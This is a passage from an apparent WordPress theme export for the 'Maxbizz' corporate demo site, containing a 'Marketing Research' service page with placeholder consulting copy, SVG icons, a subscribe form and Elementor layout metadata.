		<wp:meta_value><![CDATA[a:7:{s:6:"column";a:3:{s:5:"count";i:23;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:23;s:19:"_inline_size_tablet";i:14;}}s:8:"advanced";a:2:{s:19:"_section_responsive";a:3:{s:11:"hide_tablet";i:3;s:11:"hide_mobile";i:3;s:12:"hide_desktop";i:1;}s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:7:{s:9:"stitle_bg";i:2;s:27:"title_typography_typography";i:2;s:33:"title_typography_font_size_mobile";i:2;s:28:"stitle_typography_typography";i:2;s:27:"stitle_typography_font_size";i:2;s:12:"stitle_color";i:2;s:29:"stitle_typography_font_weight";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:10;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:7;}s:14:"section_layout";a:4:{s:6:"layout";i:6;s:3:"gap";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:7;s:14:"padding_mobile";i:4;s:14:"padding_tablet";i:2;s:13:"margin_tablet";i:2;s:6:"margin";i:1;s:7:"z_index";i:1;s:13:"margin_mobile";i:1;}s:19:"_section_responsive";a:1:{s:12:"hide_desktop";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:4;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:3:{s:13:"border_radius";i:1;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:8;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"icon_font";i:8;s:5:"title";i:8;s:3:"des";i:8;s:4:"link";i:8;}}s:5:"style";a:3:{s:18:"style_icon_section";a:3:{s:9:"is_border";i:8;s:9:"icon_size";i:8;s:7:"icon_bg";i:8;}s:21:"style_content_section";a:2:{s:27:"title_typography_typography";i:8;s:26:"title_typography_font_size";i:8;}s:17:"style_box_section";a:2:{s:18:"bg_hover_des_color";i:8;s:12:"bg_hover_box";i:8;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:5;s:15:"_padding_mobile";i:3;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:12:"testi_slider";i:1;s:6:"arrows";i:1;s:4:"dots";i:1;s:4:"loop";i:1;}}s:5:"style";a:2:{s:9:"style_nav";a:1:{s:13:"arrow_spacing";i:1;}s:13:"style_general";a:1:{s:14:"tcontent_color";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:5:"width";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Marketing Research</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/marketing-research/</link>
		<pubDate>Mon, 14 Sep 2020 07:28:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=898</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h4>How It Works &amp; How We Do It</h4>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h4>Business Planning &amp; Strategy</h4>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home4.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home4-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h5>Services</h5>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

finance planning
</a></li>
</ul>
<h5>Contacts</h5>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home4.jpg" alt="" loading="lazy">								</a>
<img src="https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg" alt="" loading="lazy">
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-corporate/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>898</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:28:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:28:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[marketing-research]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"317e6d4","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"efbeefb","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"f82bab9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"d516166","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"611317c","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"9a4f025","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"35a9e19","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"34206bb","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"04ace53","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"1ce0cf2","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"725e97b","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"d809972","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"5d64ec6","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"19280c6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7205aed","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Raleway","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#55BB53","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"84e6cfd","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"25b91f9","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"9d81515","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"42baa2b","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3ee3642","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"5b13621","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"8317533","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c212bb7","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"47aaa4f","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"72dea83","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home4.png","id":2074},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"fe0af4f","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"c0a1253","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #55bb53;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational 